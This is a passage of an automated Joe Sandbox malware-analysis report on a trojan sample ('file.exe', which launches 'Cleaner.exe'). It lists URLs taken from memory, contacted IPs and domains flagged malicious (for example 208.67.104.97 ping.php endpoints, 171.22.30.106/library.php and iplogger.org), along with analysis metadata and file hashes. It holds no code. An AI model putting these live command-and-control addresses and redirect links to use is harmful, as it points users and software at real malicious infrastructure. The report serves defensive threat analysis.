                  http://www.sandoll.co.kral0%URL Reputationsafe
                  http://www.monotype.0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/S.TTFC0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/.TTCo0%Avira URL Cloudsafe
                  http://www.sandoll.co.krrnta0%Avira URL Cloudsafe
                  http://www.zhongyicts.com.cnC0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/G.F0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/o0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/p0%URL Reputationsafe
                  https://g-cleanit.hk0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.zhongyicts.com.cno.0%URL Reputationsafe
                  http://171.22.30.106/library.php100%URL Reputationmalware
                  http://www.jiyu-kobo.co.jp/co0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/jp/ywa0%Avira URL Cloudsafe
                  http://85.31.46.167/software.phpN0%Avira URL Cloudsafe
                  http://85.31.46.167/software.phpR0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/eC0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/jp/Fa0%Avira URL Cloudsafe
                  http://www.urwpp.de%0%Avira URL Cloudsafe
                  http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte0I/R100%Avira URL Cloudmalware
                  http://www.jiyu-kobo.co.jp/jp/FC0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/Fa0%Avira URL Cloudsafe
                  http://www.zhongyicts.com.cnp.0%Avira URL Cloudsafe
                  http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteS100%Avira URL Cloudmalware
                  http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte3100%Avira URL Cloudmalware
                  http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p11740%Avira URL Cloudsafe
                  http://85.31.46.167/software.phpl0%Avira URL Cloudsafe
                  http://85.31.46.167/software.phpwv0%Avira URL Cloudsafe
                  http://www.sajatypeworks.com(0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  iplogger.org
                  		148.251.234.83
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixintetrue
                    • URL Reputation: malware
                    • URL Reputation: malware
                    		unknown
                    http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixintetrue
                    • URL Reputation: malware
                    		unknown
                    http://107.182.129.235/storage/ping.phpfalse
                    • URL Reputation: safe
                    		unknown
                    http://107.182.129.235/storage/extension.phpfalse
                    • URL Reputation: safe
                    		unknown
                    http://85.31.46.167/software.phptrue
                    • URL Reputation: safe
                    		unknown
                    http://171.22.30.106/library.phptrue
                    • URL Reputation: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.fontbureau.com/designersGCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.zhongyicts.com.cnCCleaner.exe, 00000018.00000003.525118582.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.525017399.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designers?Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://85.31.46.167/software.phpllfile.exe, 00000000.00000003.467137314.00000000009CD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174Cleaner.exe, 00000018.00000000.572538099.0000014300001000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.jiyu-kobo.co.jp/G.FCleaner.exe, 00000018.00000003.526684844.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.tiro.comCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.comcCCleaner.exe, 00000018.00000003.533706014.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.533858147.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.jiyu-kobo.co.jp/sivCleaner.exe, 00000018.00000003.526193544.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.goodfont.co.krCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com.TTFh~Cleaner.exe, 00000018.00000003.533706014.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		low
                            http://www.jiyu-kobo.co.jp/S.TTFCCleaner.exe, 00000018.00000003.526193544.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.sandoll.co.krrntaCleaner.exe, 00000018.00000003.523021041.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/.TTCoCleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.526684844.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.sajatypeworks.comCleaner.exe, 00000018.00000003.520265815.0000014375C70000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.520285612.0000014375C70000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/cTheCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/staff/dennis.htmCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://fontfabrik.comCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/coCleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleaseCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/jp/FaCleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.526684844.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://85.31.46.167/software.phpRfile.exe, 00000000.00000003.467137314.00000000009CD000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fonts.comCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.jiyu-kobo.co.jp/jp/ywaCleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.526684844.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.sandoll.co.krCleaner.exe, 00000018.00000003.523021041.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.urwpp.deDPleaseCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.zhongyicts.com.cnCleaner.exe, 00000018.00000003.525118582.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.525017399.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://85.31.46.167/software.phpNfile.exe, 00000000.00000003.467137314.00000000009CD000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCleaner.exe, 00000018.00000000.572538099.0000014300001000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.610288286.000001E431600000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.sakkal.comCleaner.exe, 00000018.00000003.527832031.0000014375C82000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/eCCleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.526193544.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.urwpp.de%Cleaner.exe, 00000018.00000003.531169581.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
                                http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte0I/Rfile.exe, 00000000.00000000.450973724.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.444182546.00000000009A2000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.comCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.galapagosdesign.com/Cleaner.exe, 00000018.00000003.536453334.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/jp/FCCleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/FaCleaner.exe, 00000018.00000003.526193544.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substfile.exe, 00000000.00000000.435842723.000000000019B000.00000004.00000010.00020000.00000000.sdmptrue
                                    • URL Reputation: malware
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/CCleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.526684844.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnp.Cleaner.exe, 00000018.00000003.525118582.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteSfile.exe, 00000000.00000000.450973724.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.444182546.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.436870708.00000000009A2000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174file.exe, 00000000.00000003.487110409.0000000003882000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.466439990.0000000003337000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.489749131.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.485888076.000000000388E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.487947725.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.492229793.0000000003CD8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.486830335.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.492756485.000000000388C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.486546343.0000000003A7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.490690243.000000000388E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.484088372.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491474837.0000000003888000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.485359675.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491876169.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.467076893.000000000309F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491018465.0000000003AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/jp/Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://iplogger.orgCleaner.exe, 00000018.00000000.572538099.0000014300001000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://iplogger.orgxCleaner.exe, 00000018.00000000.577958119.000001430040E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://85.31.46.167/software.phplfile.exe, 00000000.00000003.467137314.00000000009CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.carterandcone.comlCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://iplogger.org/1Cleaner.exe, 00000018.00000000.578942897.00000143737A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers/cabarga.htmlNCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://iplogger.orgCleaner.exe, 00000018.00000000.577997464.0000014300419000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cnCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/xCleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlCleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.sandoll.co.kralCleaner.exe, 00000018.00000003.523021041.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlCleaner.exe, 00000018.00000003.533116835.0000014375C85000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.533033296.0000014375C85000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.532846112.0000014375C85000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.532979488.0000014375C85000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.533169670.0000014375C85000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.532782774.0000014375C85000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.532928176.0000014375C85000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.533219949.0000014375C85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.monotype.Cleaner.exe, 00000018.00000003.550498086.0000014375C73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/oCleaner.exe, 00000018.00000003.526193544.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/pCleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://g-cleanit.hkfile.exe, 00000000.00000003.487110409.0000000003882000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.466439990.0000000003337000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.489749131.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.485888076.000000000388E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.487947725.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.492229793.0000000003CD8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.486830335.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.492756485.000000000388C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.486546343.0000000003A7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.490690243.000000000388E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.484088372.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491474837.0000000003888000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.485359675.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491876169.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.467076893.000000000309F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491018465.0000000003AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/Cleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.526193544.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.526684844.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cno.Cleaner.exe, 00000018.00000003.525118582.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.525017399.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://85.31.46.167/software.phpwvfile.exe, 00000000.00000003.467137314.00000000009CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fontbureau.com/designers8Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte3file.exe, 00000000.00000000.450973724.00000000009A2000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.fontbureau.com/designers0Cleaner.exe, 00000018.00000003.531169581.0000014375C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.sajatypeworks.com(Cleaner.exe, 00000018.00000003.520265815.0000014375C70000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.520285612.0000014375C70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    https://iplogger.org/1Pz8p7file.exe, 00000000.00000003.487110409.0000000003882000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.466439990.0000000003337000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.489749131.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.485888076.000000000388E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.487947725.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.492229793.0000000003CD8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.486830335.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.492756485.000000000388C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.486546343.0000000003A7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.490690243.000000000388E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.484088372.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491474837.0000000003888000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.485359675.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491876169.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.467076893.000000000309F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491018465.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.578942897.00000143737A7000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.572538099.0000014300001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      148.251.234.83
                                                      		iplogger.orgGermany
                                                      		24940HETZNER-ASDEfalse
                                                      208.67.104.97
                                                      		unknownUnited States
                                                      		20042GRAYSON-COLLIN-COMMUNICATIONSUStrue
                                                      85.31.46.167
                                                      		unknownGermany
                                                      		43659CLOUDCOMPUTINGDEtrue
                                                      107.182.129.235
                                                      		unknownReserved
                                                      		11070META-ASUSfalse
                                                      171.22.30.106
                                                      		unknownGermany
                                                      		33657CMCSUSfalse

                                                      General Information

                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                      Analysis ID:715150
                                                      Start date and time:2022-10-03 17:17:37 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 11m 26s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:file.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:34
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal96.troj.winEXE@25/55@1/5
                                                      EGA Information:Failed
                                                      HDC Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                      • TCP Packets have been reduced to 100
                                                      • Excluded IPs from analysis (whitelisted): 20.42.65.92
                                                      • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      17:20:38API Interceptor1x Sleep call for process: file.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      No context

                                                      Domains

                                                      No context

                                                      ASNs

                                                      No context

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_445db5b1e911895cef210568c60f7d906ed046_440dec59_126996c2\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9823734558168841
                                                      Encrypted:false
                                                      SSDEEP:192:cStzCfavo7Hox3uNP3jDyr+/u7sKS274ItmOBxJ:cSZ+ox3uVjd/u7sKX4ItR
                                                      MD5:3D27E454AA5C659FA47553572D16E342
                                                      SHA1:2503242294748D39AC3EC96B26F3090752035EF5
                                                      SHA-256:66D339A15AFE36587575C4347E9C6FE342EFBD280F2B1D2350EA8332F950FCC5
                                                      SHA-512:6D2F4C25DA3C280D5CC2BDE24896EE2C9E4ED255A84DD89E89FDDC5560309D8B62803F42C7B04DC98E7756820AF30A1F53DF9E446C797FF698F70EE7397BFC89
                                                      Malicious:true
